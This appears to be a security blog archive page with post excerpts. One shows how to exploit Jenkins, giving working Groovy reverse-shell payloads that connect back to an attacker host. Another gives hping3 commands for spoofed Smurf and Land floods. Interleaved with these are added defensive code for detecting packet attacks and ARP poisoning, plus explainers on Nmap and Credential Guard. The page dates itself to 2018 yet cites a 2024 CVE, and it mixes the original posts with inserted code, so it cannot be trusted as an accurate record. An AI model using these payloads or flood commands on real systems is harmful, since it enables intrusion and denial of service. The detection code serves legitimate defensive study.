
Posts

Showing posts from April, 2018

Exploiting Jenkins + CVE-2024-23897

Exploiting Jenkins / CVE-2024-23897. The script console at http://JENKINS_IP/script is often reachable without authentication because of a misconfiguration. If you do not have access to the script console but the version is vulnerable to CVE-2024-23897, exploit that instead to read files from the server and recover authentication credentials for Jenkins (explained below). The script console executes Groovy, so getting a reverse shell is a matter of running the following script.
For Linux:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/YOUR_IP/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
For Windows:
String host="YOUR_IP"; int port=PORT; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStrea

DoS Attacks : Smurf,Fraggle,Land

Smurf attack. Smurf is a DoS method that floods the victim with ICMP echo traffic rather than TCP SYN packets: the attacker sends ICMP echo requests to a network's broadcast address with the source IP spoofed to the victim's address, so every host that answers the ping floods the victim with replies. Most modern devices drop directed broadcasts and ignore echo requests sent to a broadcast address, so Smurf is rarely a threat today.
#hping3 -1 --flood --spoof <target> <broadcast_address>
Fraggle attack. Similar to Smurf, but instead of ICMP it uses UDP packets to ports 7 (echo) and 19 (chargen), again broadcast with the victim's spoofed source IP. All devices on the network then respond to the victim, as in the Smurf attack.
Land attack. The attacker sends spoofed SYN packets to the victim with the victim's IP address as both source and destination IP (classically with the same source and destination port). The system then keeps replying to itself, which can crash it.
#hping3 -c <packet_count> -s <src_port> -d <dst_port> --floo
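All three attacks are recognisable from header fields alone, which is how an IDS rule or a capture-review script catches them. The classifier below is an added example, not code from the original post: it parses the IPv4 header and the first bytes of ICMP, UDP and TCP and tests exactly the three conditions described above. The packets are constructed in the block (not captures) and the 192.0.2.0/24 local network is an assumption.

```python
"""Flag Smurf, Fraggle and Land packets by header inspection.

Added example, not code from the original post. Sample packets are
constructed here for illustration; the local /24 is an assumption.
"""
import ipaddress
import socket
import struct

LOCAL_NET = ipaddress.IPv4Network("192.0.2.0/24")   # assumed local subnet
LIMITED_BROADCAST = ipaddress.IPv4Address("255.255.255.255")


def ip_checksum(data: bytes) -> int:
    """Ones-complement checksum as used in the IPv4 header."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """Minimal 20-byte IPv4 header (no options) in front of `payload`."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64,
                      proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    hdr = hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:]
    return hdr + payload


def classify(packet: bytes, local_net: ipaddress.IPv4Network = LOCAL_NET) -> str:
    """Return 'smurf', 'fraggle', 'land' or 'benign' for one IPv4 packet."""
    if len(packet) < 20 or packet[0] >> 4 != 4:
        return "benign"
    ihl = (packet[0] & 0x0F) * 4
    proto = packet[9]
    src = ipaddress.IPv4Address(packet[12:16])
    dst = ipaddress.IPv4Address(packet[16:20])
    l4 = packet[ihl:]
    to_broadcast = dst in (local_net.broadcast_address, LIMITED_BROADCAST)

    # Smurf: ICMP echo request (type 8) aimed at the broadcast address,
    # so every host replies to whatever source address was spoofed.
    if proto == 1 and len(l4) >= 8 and l4[0] == 8 and to_broadcast:
        return "smurf"
    # Fraggle: same idea over UDP echo (7) or chargen (19).
    if proto == 17 and len(l4) >= 8:
        dport = struct.unpack("!H", l4[2:4])[0]
        if to_broadcast and dport in (7, 19):
            return "fraggle"
    # Land: TCP SYN whose source and destination IP (and port) are the same.
    if proto == 6 and len(l4) >= 20:
        sport, dport = struct.unpack("!HH", l4[:4])
        syn = l4[13] & 0x02
        if syn and src == dst and sport == dport:
            return "land"
    return "benign"


# Constructed sample packets: one of each attack plus an ordinary ping.
ICMP_ECHO_REQ = struct.pack("!BBHHH", 8, 0, 0, 1, 1)
UDP_TO_CHARGEN = struct.pack("!HHHH", 40000, 19, 8, 0)
TCP_SYN_80 = struct.pack("!HHIIBBHHH", 80, 80, 0, 0, 0x50, 0x02, 8192, 0, 0)

SAMPLES = {
    "smurf":   build_ipv4("192.0.2.10", "192.0.2.255", 1, ICMP_ECHO_REQ),
    "fraggle": build_ipv4("192.0.2.10", "192.0.2.255", 17, UDP_TO_CHARGEN),
    "land":    build_ipv4("192.0.2.10", "192.0.2.10", 6, TCP_SYN_80),
    "benign":  build_ipv4("192.0.2.10", "192.0.2.20", 1, ICMP_ECHO_REQ),
}


def run_samples() -> dict:
    """Classify every constructed sample; keys name the expected verdict."""
    return {name: classify(pkt) for name, pkt in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in run_samples().items():
        print(f"{name:8s} -> {verdict}")
```

The broadcast check is what makes Smurf and Fraggle different from a plain ping or UDP probe, and the spoofed source is invisible at the victim, so the useful place to run this logic is at the border router or on the amplifying network, not on the target.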

Nmap : Basic overview on Scanning Techniques

Nmap. One of the most widely used scanning tools in networking and security. Nmap supports many scanning techniques; this post is intended to give a basic overview of them. 1) Ping Scan [-sP] (current Nmap releases call the same scan -sn). This type of scan is used to find which computers or devices are online rather than which ports are open. Nmap sends an ICMP ECHO REQUEST to the destination system. If an ICMP ECHO REPLY comes back, the system is considered up and ICMP is not being blocked. If there is no response to the ICMP ping, Nmap tries a "TCP ping" to determine whether ICMP is blocked or the host is really offline. A TCP ping sends either a SYN or an ACK packet to a port on the remote system (80 is the default). If an RST or a SYN/ACK comes back, the remote system is online: an RST means the port is closed, but a live stack sent it. If the remote system does not respond at all, either it is offline or the chosen port is filtered, in which case it will not respond to anything.
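The decision procedure above is small enough to write out, and doing so makes the one ambiguous outcome explicit: no answer to either probe cannot distinguish an offline host from one behind a firewall that drops both. The block below is an added example, not nmap's code; the `send` callable stands in for the network and the three fake hosts are constructed for illustration.

```python
"""Ping-scan host discovery decision, as described in the post above.

Added example, not nmap's code. `send` stands in for the network: it
takes a probe name and a port and returns the response type observed
('echo-reply', 'syn-ack', 'rst') or None when nothing came back. The
fake hosts at the bottom are constructed, not real network behaviour.
"""
from typing import Callable, Dict, Optional, Tuple

Prober = Callable[[str, int], Optional[str]]


def discover(send: Prober, tcp_port: int = 80) -> Tuple[bool, str]:
    """Return (is_up, reason), in the spirit of nmap's --reason column.

    1. ICMP echo request: a reply proves the host is up and ICMP is not filtered.
    2. Otherwise a TCP ping to `tcp_port`: SYN/ACK (open) or RST (closed)
       both come from a live stack, so either one marks the host up.
    3. No answer to either: offline, or the probes are filtered; the scan
       reports the host as down and cannot tell which from here.
    """
    if send("icmp-echo", 0) == "echo-reply":
        return True, "echo-reply"
    answer = send("tcp-syn", tcp_port)
    if answer in ("syn-ack", "rst"):
        return True, answer
    return False, "no-response"


def sweep(hosts: Dict[str, Prober], tcp_port: int = 80) -> Dict[str, Tuple[bool, str]]:
    """Run discovery against every host and collect the verdicts."""
    return {name: discover(send, tcp_port) for name, send in hosts.items()}


# Constructed fake hosts (not real network behaviour).
def answers_everything(probe: str, port: int) -> Optional[str]:
    return "echo-reply" if probe == "icmp-echo" else "syn-ack"


def icmp_filtered(probe: str, port: int) -> Optional[str]:
    # ICMP dropped at a firewall, port 80 closed: the RST still reveals the host.
    return None if probe == "icmp-echo" else "rst"


def fully_filtered(probe: str, port: int) -> Optional[str]:
    return None


FAKE_HOSTS = {
    "open-host": answers_everything,
    "icmp-blocked": icmp_filtered,
    "silent": fully_filtered,
}

if __name__ == "__main__":
    for host, (up, reason) in sweep(FAKE_HOSTS).items():
        print(f"{host:13s} up={up} reason={reason}")
```

The 'silent' case is why a ping sweep that reports a host as down is not proof of absence; against a filtered network the follow-up is a port scan with host discovery disabled (-Pn).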

Why you should not believe in Online Reviews and Social networking sites?

Most of us, before buying a product from Amazon/Flipkart or booking a movie ticket, go through the review section to see what others think about it: how good is it, what are the pros and cons, and so on. Let me tell you a fact. Though there are genuine reviews written by genuine customers and users, the majority of reviews are paid reviews. Paid opinions can likewise be seen in forums like Quora and Yahoo Answers. When it comes to social networking websites, there are big companies working for corporations, political parties and ideological institutions. Many of us are addicted to these social networking sites, and we like and share things we are not sure about. All of them want to maximize their profit, and for that they will use even the worst methods to make things go viral. These institutions pay millions to distribute and publicize their propaganda; in short, to brainwash the audience. When thousands write a good review of a bad product, that product automatically become

Microsoft Windows Server 2016 Virtualization Based Security and Credential Guard

Virtualization Based Security (VBS) is a major Windows feature released with Windows Server 2016 and Windows 10. Credential Guard, available on the same operating systems, protects domain credentials (Kerberos tickets and NTLM hashes) from being read out of memory, which is what Pass the Hash and other credential-theft attacks rely on. Credential Guard leverages the Virtual Secure Mode (VSM) of VBS to run an Isolated User Mode process whose memory the normal operating system, including its kernel, cannot read, so the secrets cannot be stolen from it. The Device Guard feature also relies on VBS. In Windows, NTLM and Kerberos authentication for remote administration is handled by LSASS, the user-mode process responsible for authentication and user isolation; without Credential Guard, LSASS holds the hashes in its memory, and an attacker who can read that memory can pass them. Upon enabling Credential Guard, the Local

What is a Gratuitous ARP? How is it used in Network attacks?

Many of us have encountered the word "Gratuitous" while exploring ARP, the Address Resolution Protocol. Before explaining Gratuitous ARP, here is a quick review of how ARP works. ARP provides IP communication within a Layer 2 broadcast domain by mapping an IP address to a MAC address. For example, Host B wants to send data to Host A but does not have Host A's MAC address in its ARP cache. Host B broadcasts an ARP request to all hosts in the broadcast domain asking for the MAC address associated with Host A's IP address. All hosts in the broadcast domain receive the request, and Host A responds with its MAC address. You can see the ARP entries on your own computer with the command arp -a . So, back to the topic of what a gratuitous ARP is. A gratuitous ARP is an ARP packet a device sends that is not a response to any request. Typically, a gratuitous ARP request is an ARP request packe
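On the wire the defining property of a gratuitous ARP is that the sender IP equals the target IP, and the reason it matters for attacks is that hosts update their cache from it: a gratuitous ARP that rewrites an existing IP-to-MAC mapping is what ARP cache poisoning looks like. The block below is an added example, not code from the original post: it builds and parses Ethernet/IPv4 ARP frames, tests the gratuitous condition, and keeps a small table so that a rewrite of a known mapping is reported. The MAC and IP values are made-up sample data, and learning the table from every ARP seen is a simplification.

```python
"""Spot gratuitous ARP and detect when it rewrites a known IP-to-MAC mapping.

Added example, not code from the original post. Frames are constructed
below, not captured; MAC and IP values are made-up sample data.
"""
import struct

ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST_MAC = "ff:ff:ff:ff:ff:ff"


def mac_bytes(mac: str) -> bytes:
    return bytes(int(part, 16) for part in mac.split(":"))


def ip_bytes(ip: str) -> bytes:
    return bytes(int(part) for part in ip.split("."))


def fmt_mac(raw: bytes) -> str:
    return ":".join(f"{x:02x}" for x in raw)


def fmt_ip(raw: bytes) -> str:
    return ".".join(str(x) for x in raw)


def build_arp(op: int, sender_mac: str, sender_ip: str, target_mac: str,
              target_ip: str, dst_mac: str = BROADCAST_MAC) -> bytes:
    """Ethernet II frame carrying an ARP packet (Ethernet/IPv4 only)."""
    eth = mac_bytes(dst_mac) + mac_bytes(sender_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
           + mac_bytes(sender_mac) + ip_bytes(sender_ip)
           + mac_bytes(target_mac) + ip_bytes(target_ip))
    return eth + arp


def parse_arp(frame: bytes):
    """Return the ARP fields as a dict, or None if not Ethernet/IPv4 ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "sender_mac": fmt_mac(frame[22:28]),
        "sender_ip": fmt_ip(frame[28:32]),
        "target_mac": fmt_mac(frame[32:38]),
        "target_ip": fmt_ip(frame[38:42]),
    }


def is_gratuitous(arp: dict) -> bool:
    """Gratuitous ARP announces the sender's own mapping: sender IP == target IP."""
    return arp["sender_ip"] == arp["target_ip"]


class ArpMonitor:
    """Learns sender IP -> MAC from every ARP seen and flags rewrites.

    A gratuitous ARP that changes an existing mapping is how ARP cache
    poisoning looks on the wire; 'gratuitous-conflict' is the alert.
    (Learning from every ARP, not only replies, is a simplification.)
    """

    def __init__(self):
        self.table = {}

    def observe(self, frame: bytes) -> str:
        arp = parse_arp(frame)
        if arp is None:
            return "not-arp"
        previous = self.table.get(arp["sender_ip"])
        self.table[arp["sender_ip"]] = arp["sender_mac"]
        if is_gratuitous(arp):
            if previous is not None and previous != arp["sender_mac"]:
                return "gratuitous-conflict"
            return "gratuitous"
        return "request" if arp["op"] == ARP_REQUEST else "reply"


# Constructed sample traffic: a normal request, a legitimate gratuitous
# announcement, then a gratuitous ARP from another MAC claiming the same IP.
SAMPLE_FRAMES = [
    build_arp(ARP_REQUEST, "02:00:00:00:00:0b", "192.0.2.11", "00:00:00:00:00:00", "192.0.2.1"),
    build_arp(ARP_REQUEST, "02:00:00:00:00:01", "192.0.2.1", "00:00:00:00:00:00", "192.0.2.1"),
    build_arp(ARP_REPLY, "02:00:00:00:00:66", "192.0.2.1", BROADCAST_MAC, "192.0.2.1"),
]


def run_samples() -> list:
    """Feed the constructed frames through one monitor and return its verdicts."""
    mon = ArpMonitor()
    return [mon.observe(f) for f in SAMPLE_FRAMES]


if __name__ == "__main__":
    print(run_samples())
```

A legitimate gratuitous ARP (a host announcing itself after boot or an IP change) and a poisoning attempt are identical packets; what separates them is whether the mapping they carry contradicts what was already known, which is why the monitor needs state.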

Is the Employee Data as Important as Customer data?

Hi guys, there is this organization that boasts about standards and policies. Yes, though these things are inevitable for the reputation of the company and for data security, they actually matter only if they are really implemented in practice. I have seen many organizations that create policies only for the sake of audit/compliance. Do you have a policy on data security? YES. Do you have a data security policy implemented in practice? Hmmm!!! Companies might be certified and meet the regulatory standards, but nothing is actually in practice. Let me share an incident with you. I accidentally discovered this thing in a normal Google search. I searched for something and found an interesting result. Out of curiosity, I clicked on that particular Google search result and it took me to that company's employee directory. The whole directory. I could search for any employee; I could see their employee code, department and location. Do you want to know how big the list is? Yes, a few t